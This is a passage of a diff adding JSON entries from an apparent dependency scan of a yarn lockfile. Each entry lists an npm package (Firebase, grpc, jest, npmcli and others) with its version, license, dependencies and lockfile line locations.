"@firebase/functions-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/functions-compat@0.4.1", + "UID": "77a657ad190eed47" + }, + "Version": "0.4.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/functions@0.13.1", + "@firebase/functions-types@0.6.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1366, + "EndLine": 1375 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/functions-types@0.6.3", + "Name": "@firebase/functions-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/functions-types@0.6.3", + "UID": "17e85ca15fc9a4dd" + }, + "Version": "0.6.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1377, + "EndLine": 1380 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/installations@0.6.19", + "Name": "@firebase/installations", + "Identifier": { + "PURL": "pkg:npm/%40firebase/installations@0.6.19", + "UID": "8f48ae8acdcc7bef" + }, + "Version": "0.6.19", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "idb@7.1.1", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1410, + "EndLine": 1418 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/installations-compat@0.2.19", + "Name": "@firebase/installations-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/installations-compat@0.2.19", + "UID": "aa339cf7ea82505c" + }, + "Version": "0.2.19", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/installations-types@0.5.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1394, + "EndLine": 1403 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/installations-types@0.5.3", + "Name": "@firebase/installations-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/installations-types@0.5.3", + "UID": "de4df51c6f471a77" + }, + "Version": "0.5.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1405, + "EndLine": 1408 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/logger@0.5.0", + "Name": "@firebase/logger", + "Identifier": { + "PURL": "pkg:npm/%40firebase/logger@0.5.0", + "UID": "c40e3933870841c6" + }, + "Version": "0.5.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1420, + "EndLine": 1425 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/messaging@0.12.23", + "Name": "@firebase/messaging", + "Identifier": { + "PURL": "pkg:npm/%40firebase/messaging@0.12.23", + "UID": "8af53a8dfcbc8e7d" + }, + "Version": "0.12.23", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/messaging-interop-types@0.2.3", + "@firebase/util@1.13.0", + "idb@7.1.1", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1442, + "EndLine": 1452 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/messaging-compat@0.2.23", + "Name": "@firebase/messaging-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/messaging-compat@0.2.23", + "UID": "9b297c73c977d92c" + }, + "Version": "0.2.23", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/messaging@0.12.23", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1427, + "EndLine": 1435 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/messaging-interop-types@0.2.3", + "Name": "@firebase/messaging-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/messaging-interop-types@0.2.3", + "UID": "41cdae44b1f8c9d3" + }, + "Version": "0.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1437, + "EndLine": 1440 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/performance@0.7.9", + "Name": "@firebase/performance", + "Identifier": { + "PURL": "pkg:npm/%40firebase/performance@0.7.9", + "UID": "809fb7eab42e9843" + }, + "Version": "0.7.9", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1", + "web-vitals@4.2.4" + ], + "Locations": [ + { + "StartLine": 1471, + "EndLine": 1481 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/performance-compat@0.2.22", + "Name": "@firebase/performance-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/performance-compat@0.2.22", + "UID": "298d678ac0b0a98f" + }, + "Version": "0.2.22", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/performance@0.7.9", + "@firebase/performance-types@0.2.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1454, + "EndLine": 1464 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/performance-types@0.2.3", + "Name": "@firebase/performance-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/performance-types@0.2.3", + "UID": "9105ee439f6cd9c7" + }, + "Version": "0.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1466, + "EndLine": 1469 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/remote-config@0.6.6", + "Name": "@firebase/remote-config", + "Identifier": { + "PURL": "pkg:npm/%40firebase/remote-config@0.6.6", + "UID": "b6edc39b6f049d94" + }, + "Version": "0.6.6", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1500, + "EndLine": 1509 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/remote-config-compat@0.2.19", + "Name": "@firebase/remote-config-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/remote-config-compat@0.2.19", + "UID": "924e3ca5b327a151" + }, + "Version": "0.2.19", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/remote-config@0.6.6", + "@firebase/remote-config-types@0.4.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1483, + "EndLine": 1493 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/remote-config-types@0.4.0", + "Name": "@firebase/remote-config-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/remote-config-types@0.4.0", + "UID": "95229723b107f59b" + }, + "Version": "0.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1495, + "EndLine": 1498 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/storage@0.14.0", + "Name": "@firebase/storage", + "Identifier": { + "PURL": "pkg:npm/%40firebase/storage@0.14.0", + "UID": "1a6810a62f691b2a" + }, + "Version": "0.14.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1527, + "EndLine": 1534 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/storage-compat@0.4.0", + "Name": "@firebase/storage-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/storage-compat@0.4.0", + "UID": "214df88f029875ef" + }, + "Version": "0.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/storage@0.14.0", + "@firebase/storage-types@0.8.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1511, + "EndLine": 1520 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/storage-types@0.8.3", + "Name": "@firebase/storage-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/storage-types@0.8.3", + "UID": "b39ed7e3f364c431" + }, + "Version": "0.8.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1522, + "EndLine": 1525 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/util@1.13.0", + "Name": "@firebase/util", + "Identifier": { + "PURL": "pkg:npm/%40firebase/util@1.13.0", + "UID": "71cea689cd874069" + }, + "Version": "1.13.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1536, + "EndLine": 1541 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/webchannel-wrapper@1.0.4", + "Name": "@firebase/webchannel-wrapper", + "Identifier": { + "PURL": "pkg:npm/%40firebase/webchannel-wrapper@1.0.4", + "UID": "a76703bd2ecb36e2" + }, + "Version": "1.0.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1543, + "EndLine": 1546 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@grpc/grpc-js@1.9.15", + "Name": "@grpc/grpc-js", + "Identifier": { + "PURL": "pkg:npm/%40grpc/grpc-js@1.9.15", + "UID": "4a47e107b32349e3" + }, + "Version": "1.9.15", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@grpc/proto-loader@0.7.15", + "@types/node@24.7.0" + ], + "Locations": [ + { + "StartLine": 1553, + "EndLine": 1559 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@grpc/proto-loader@0.7.15", + "Name": "@grpc/proto-loader", + "Identifier": { + "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", + "UID": "647b34b3f8243b8b" + }, + "Version": "0.7.15", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lodash.camelcase@4.3.0", + "long@5.3.2", + "protobufjs@7.5.4", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 1561, + "EndLine": 1569 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@isaacs/balanced-match@4.0.1", + "Name": "@isaacs/balanced-match", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/balanced-match@4.0.1", + "UID": "e84a375658c5853a" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1602, + "EndLine": 1603 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@isaacs/brace-expansion@5.0.0", + "Name": "@isaacs/brace-expansion", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", + "UID": "885a889e7cdb5828" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/balanced-match@4.0.1" + ], + "Locations": [ + { + "StartLine": 1605, + "EndLine": 1608 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@isaacs/cliui@8.0.2", + "Name": "@isaacs/cliui", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", + "UID": "d0da5818a82f98b8" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@5.1.2", + "string-width-cjs@4.2.3", + "strip-ansi@7.1.2", + "strip-ansi-cjs@6.0.1", + "wrap-ansi@8.1.0", + "wrap-ansi-cjs@7.0.0" + ], + "Locations": [ + { + "StartLine": 1610, + "EndLine": 1620 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@isaacs/fs-minipass@4.0.1", + "Name": "@isaacs/fs-minipass", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/fs-minipass@4.0.1", + "UID": "9087080fa6e915d6" + }, + "Version": "4.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 1622, + "EndLine": 1627 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@isaacs/string-locale-compare@1.1.0", + "Name": "@isaacs/string-locale-compare", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/string-locale-compare@1.1.0", + "UID": "559e22cc9cdf9aab" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1629, + "EndLine": 1632 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@isaacs/ttlcache@1.4.1", + "Name": "@isaacs/ttlcache", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/ttlcache@1.4.1", + "UID": "37ad6e4258d7c668" + }, + "Version": "1.4.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1634, + "EndLine": 1637 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@istanbuljs/load-nyc-config@1.1.0", + "Name": "@istanbuljs/load-nyc-config", + "Identifier": { + "PURL": "pkg:npm/%40istanbuljs/load-nyc-config@1.1.0", + "UID": "fb9cae5d4bcc4c60" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase@5.3.1", + "find-up@4.1.0", + "get-package-type@0.1.0", + "js-yaml@3.14.1", + "resolve-from@5.0.0" + ], + "Locations": [ + { + "StartLine": 1639, + "EndLine": 1648 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@istanbuljs/schema@0.1.3", + "Name": "@istanbuljs/schema", + "Identifier": { + "PURL": "pkg:npm/%40istanbuljs/schema@0.1.3", + "UID": "94f85310633869ea" + }, + "Version": "0.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1650, + "EndLine": 1653 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jest/create-cache-key-function@29.7.0", + "Name": "@jest/create-cache-key-function", + "Identifier": { + "PURL": "pkg:npm/%40jest/create-cache-key-function@29.7.0", + "UID": "c60cc21f5c888eeb" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3" + ], + "Locations": [ + { + "StartLine": 1701, + "EndLine": 1706 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jest/environment@29.7.0", + "Name": "@jest/environment", + "Identifier": { + "PURL": "pkg:npm/%40jest/environment@29.7.0", + "UID": "dbe697a7fd2b9c00" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/fake-timers@29.7.0", + "@jest/types@29.6.3", + "@types/node@24.7.0", + "jest-mock@29.7.0" + ], + "Locations": [ + { + "StartLine": 1708, + "EndLine": 1716 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jest/fake-timers@29.7.0", + "Name": "@jest/fake-timers", + "Identifier": { + "PURL": "pkg:npm/%40jest/fake-timers@29.7.0", + "UID": "a9bb7d1b873a3b88" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@sinonjs/fake-timers@10.3.0", + "@types/node@24.7.0", + "jest-message-util@29.7.0", + "jest-mock@29.7.0", + "jest-util@29.7.0" + ], + "Locations": [ + { + "StartLine": 1733, + "EndLine": 1743 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jest/schemas@29.6.3", + "Name": "@jest/schemas", + "Identifier": { + "PURL": "pkg:npm/%40jest/schemas@29.6.3", + "UID": "efd92a17b357faae" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sinclair/typebox@0.27.8" + ], + "Locations": [ + { + "StartLine": 1785, + "EndLine": 1790 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jest/transform@29.7.0", + "Name": "@jest/transform", + "Identifier": { + "PURL": "pkg:npm/%40jest/transform@29.7.0", + "UID": "d878b80bd72b46ec" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@jest/types@29.6.3", + "@jridgewell/trace-mapping@0.3.31", + "babel-plugin-istanbul@6.1.1", + "chalk@4.1.2", + "convert-source-map@2.0.0", + "fast-json-stable-stringify@2.1.0", + "graceful-fs@4.2.11", + "jest-haste-map@29.7.0", + "jest-regex-util@29.6.3", + "jest-util@29.7.0", + "micromatch@4.0.8", + "pirates@4.0.7", + "slash@3.0.0", + "write-file-atomic@4.0.2" + ], + "Locations": [ + { + "StartLine": 1821, + "EndLine": 1840 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jest/types@29.6.3", + "Name": "@jest/types", + "Identifier": { + "PURL": "pkg:npm/%40jest/types@29.6.3", + "UID": "c6671c97e6f5aa63" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/schemas@29.6.3", + "@types/istanbul-lib-coverage@2.0.6", + "@types/istanbul-reports@3.0.4", + "@types/node@24.7.0", + "@types/yargs@17.0.33", + "chalk@4.1.2" + ], + "Locations": [ + { + "StartLine": 1842, + "EndLine": 1852 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jridgewell/gen-mapping@0.3.13", + "Name": "@jridgewell/gen-mapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", + "UID": "9d240ac1cdc7f56a" + }, + "Version": "0.3.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/sourcemap-codec@1.5.5", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 1854, + "EndLine": 1860 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jridgewell/remapping@2.3.5", + "Name": "@jridgewell/remapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/remapping@2.3.5", + "UID": "6e46742d6cafb5c6" + }, + "Version": "2.3.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/gen-mapping@0.3.13", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 1862, + "EndLine": 1868 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jridgewell/resolve-uri@3.1.2", + "Name": "@jridgewell/resolve-uri", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", + "UID": "9f0830fe3d960fc0" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1870, + "EndLine": 1873 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jridgewell/source-map@0.3.11", + "Name": "@jridgewell/source-map", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/source-map@0.3.11", + "UID": "30f5d012149d467" + }, + "Version": "0.3.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/gen-mapping@0.3.13", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 1875, + "EndLine": 1881 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jridgewell/sourcemap-codec@1.5.5", + "Name": "@jridgewell/sourcemap-codec", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", + "UID": "511acf4f0aa6899d" + }, + "Version": "1.5.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1883, + "EndLine": 1886 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@jridgewell/trace-mapping@0.3.31", + "Name": "@jridgewell/trace-mapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", + "UID": "326670d0cece4ede" + }, + "Version": "0.3.31", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/resolve-uri@3.1.2", + "@jridgewell/sourcemap-codec@1.5.5" + ], + "Locations": [ + { + "StartLine": 1888, + "EndLine": 1894 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@nodelib/fs.scandir@2.1.5", + "Name": "@nodelib/fs.scandir", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", + "UID": "dc8b4d9e69a7e2f4" + }, + "Version": "2.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.stat@2.0.5", + "run-parallel@1.2.0" + ], + "Locations": [ + { + "StartLine": 1910, + "EndLine": 1916 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@nodelib/fs.stat@2.0.5", + "Name": "@nodelib/fs.stat", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", + "UID": "b12e190f6eb8e426" + }, + "Version": "2.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1918, + "EndLine": 1921 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@nodelib/fs.walk@1.2.8", + "Name": "@nodelib/fs.walk", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", + "UID": "e0cb370fc7462dcf" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.scandir@2.1.5", + "fastq@1.19.1" + ], + "Locations": [ + { + "StartLine": 1923, + "EndLine": 1929 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/agent@3.0.0", + "Name": "@npmcli/agent", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/agent@3.0.0", + "UID": "9dfda4468e29394f" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "http-proxy-agent@7.0.2", + "https-proxy-agent@7.0.6", + "lru-cache@10.4.3", + "socks-proxy-agent@8.0.5" + ], + "Locations": [ + { + "StartLine": 1931, + "EndLine": 1938 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/agent@4.0.0", + "Name": "@npmcli/agent", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/agent@4.0.0", + "UID": "c6938f930b479c00" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "http-proxy-agent@7.0.2", + "https-proxy-agent@7.0.6", + "lru-cache@11.2.2", + "socks-proxy-agent@8.0.5" + ], + "Locations": [ + { + "StartLine": 1940, + "EndLine": 1949 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/arborist@9.1.6", + "Name": "@npmcli/arborist", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/arborist@9.1.6", + "UID": "9f42207f7695de3f" + }, + "Version": "9.1.6", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/string-locale-compare@1.1.0", + "@npmcli/fs@4.0.0", + "@npmcli/installed-package-contents@3.0.0", + "@npmcli/map-workspaces@5.0.0", + "@npmcli/metavuln-calculator@9.0.2", + "@npmcli/name-from-folder@3.0.0", + "@npmcli/node-gyp@4.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/query@4.0.1", + "@npmcli/redact@3.2.2", + "@npmcli/run-script@10.0.0", + "bin-links@5.0.0", + "cacache@20.0.1", + "common-ancestor-path@1.0.1", + "hosted-git-info@9.0.2", + "json-stringify-nice@1.1.4", + "lru-cache@11.2.2", + "minimatch@10.0.3", + "nopt@8.1.0", + "npm-install-checks@7.1.2", + "npm-package-arg@13.0.1", + "npm-pick-manifest@11.0.1", + "npm-registry-fetch@19.0.0", + "pacote@21.0.3", + "parse-conflict-json@4.0.0", + "proc-log@5.0.0", + "proggy@3.0.0", + "promise-all-reject-late@1.0.1", + "promise-call-limit@3.0.2", + "semver@7.7.3", + "ssri@12.0.0", + "treeverse@3.0.0", + "walk-up-path@4.0.0" + ], + "Locations": [ + { + "StartLine": 1951, + "EndLine": 1986 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/config@10.4.2", + "Name": "@npmcli/config", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/config@10.4.2", + "UID": "11a350b99900872b" + }, + "Version": "10.4.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/map-workspaces@5.0.0", + "@npmcli/package-json@7.0.1", + "ci-info@4.3.1", + "ini@5.0.0", + "nopt@8.1.0", + "proc-log@5.0.0", + "semver@7.7.3", + "walk-up-path@4.0.0" + ], + "Locations": [ + { + "StartLine": 1988, + "EndLine": 1998 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/fs@4.0.0", + "Name": "@npmcli/fs", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/fs@4.0.0", + "UID": "c851d3813a2615a0" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 2008, + "EndLine": 2011 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/git@7.0.0", + "Name": "@npmcli/git", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/git@7.0.0", + "UID": "265413e695b4e3b" + }, + "Version": "7.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/promise-spawn@8.0.3", + "ini@5.0.0", + "lru-cache@11.2.2", + "npm-pick-manifest@11.0.1", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "semver@7.7.3", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 2013, + "EndLine": 2023 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/installed-package-contents@3.0.0", + "Name": "@npmcli/installed-package-contents", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/installed-package-contents@3.0.0", + "UID": "1976761e233f4d85" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-bundled@4.0.0", + "npm-normalize-package-bin@4.0.0" + ], + "Locations": [ + { + "StartLine": 2025, + "EndLine": 2029 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/map-workspaces@5.0.0", + "Name": "@npmcli/map-workspaces", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/map-workspaces@5.0.0", + "UID": "5d5c917f27063e86" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/name-from-folder@3.0.0", + "@npmcli/package-json@7.0.1", + "glob@11.0.3", + "minimatch@10.0.3" + ], + "Locations": [ + { + "StartLine": 2031, + "EndLine": 2037 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/metavuln-calculator@9.0.2", + "Name": "@npmcli/metavuln-calculator", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/metavuln-calculator@9.0.2", + "UID": "97bc19f74714b1ab" + }, + "Version": "9.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cacache@20.0.1", + "json-parse-even-better-errors@4.0.0", + "pacote@21.0.3", + "proc-log@5.0.0", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 2039, + "EndLine": 2046 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@npmcli/name-from-folder@3.0.0", + "Name": "@npmcli/name-from-folder", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/name-from-folder@3.0.0", + "UID": "342433ad51eb6211" + }, + "Version": 